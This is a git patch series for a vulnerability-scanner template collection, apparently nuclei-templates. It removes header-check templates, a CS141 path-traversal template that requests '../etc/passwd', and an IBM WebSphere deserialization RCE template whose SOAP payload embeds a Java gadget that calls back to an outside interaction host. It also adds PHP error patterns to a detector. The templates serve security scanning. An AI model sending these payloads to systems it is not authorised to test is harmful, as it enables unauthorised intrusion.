+++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-11420 - -info: - name: ABB UPS Adapter CS141 – Path traversal - author: socketz - severity: medium - description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path - Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, - and then you can exploit it, before that, you should wait. - reference: - - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf - tags: cve,cve2020,iot,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" - - headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file From 32fed54169da875c38d139b61143aa7344234ae9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:35:58 +0530 Subject: [PATCH 33/35] removing duplicate templates and few updates --- miscellaneous/missing-csp.yaml | 17 ----------------- miscellaneous/missing-hsts.yaml | 17 ----------------- .../missing-x-content-type-options.yaml | 18 ------------------ miscellaneous/missing-x-frame-options.yaml | 19 ------------------- .../http-missing-security-headers.yaml | 4 ++-- 5 files changed, 2 insertions(+), 73 deletions(-) delete mode 100644 miscellaneous/missing-csp.yaml delete mode 100644 miscellaneous/missing-hsts.yaml delete mode 100644 miscellaneous/missing-x-content-type-options.yaml delete mode 100644 miscellaneous/missing-x-frame-options.yaml diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml deleted file mode 100644 index 0d2a7dc176..0000000000 --- a/miscellaneous/missing-csp.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-csp -info: - name: CSP Not Enforced - author: geeknik - severity: info - description: Checks if there is a CSP header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''content-security-policy'')' diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml deleted file mode 100644 index 3f07038249..0000000000 --- a/miscellaneous/missing-hsts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-hsts -info: - name: Strict Transport Security Not Enforced - author: Dawid Czarnecki - severity: info - description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''strict-transport-security'')' diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml deleted file mode 100644 index e059f4c9be..0000000000 --- a/miscellaneous/missing-x-content-type-options.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: missing-x-content-type-options - -info: - name: X-Content-Type-Options unidentified - author: G4L1T0 and @convisoappsec - severity: info - description: Check for X-Content-Type-Options header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''x-content-type-options'')' diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml deleted file mode 100644 index a7bece93c3..0000000000 --- a/miscellaneous/missing-x-frame-options.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: missing-x-frame-options - -info: - name: Clickjacking (Missing XFO header) - author: kurohost - severity: low - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 97d80d6c05..aef6738399 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -2,10 +2,10 @@ id: http-missing-security-headers info: name: HTTP Missing Security Headers - author: socketz + author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration,generic + tags: misconfig,generic requests: - method: GET From 735b1df1c56648acb0968bf9ef751e8bd68b3f17 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 12:09:59 -0500 Subject: [PATCH 34/35] Update php-errors.yaml --- misconfiguration/php-errors.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index 11e7defb9f..02bd1efcb3 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -18,6 +18,7 @@ requests: - '(?i)Call to undefined method' - '(?i)You have an error in your SQL syntax' - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' - '(?i)PHP (Warning|Error)' - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' - '(?i)failed to open stream\:' @@ -35,3 +36,5 @@ requests: - '(?i)expects parameter [0-9]*' - '(?i)Debug Trace' - '(?i)(syntax|parse) error' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' From a30ee89de4e745b233138b11894102b4183d949c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 14:38:33 +0530 Subject: [PATCH 35/35] temporary removal This template requires support that will be part of next version of nuclei, as such keeping this template in PR till next nuclei release --- cves/2015/CVE-2015-7450.yaml | 51 ------------------------------------ 1 file changed, 51 deletions(-) delete mode 100644 cves/2015/CVE-2015-7450.yaml diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml deleted file mode 100644 index a28bfc6ead..0000000000 --- a/cves/2015/CVE-2015-7450.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2015-7450 - -info: - name: IBM WebSphere Java Object Deserialization RCE - author: wdahlenb - severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) - reference: - - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=utf-8 - SOAPAction: "urn:AdminService" - - - - - - - - rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== - getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} - rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= - - - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - 'SOAP-ENV:Server' - - '' - condition: and - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns"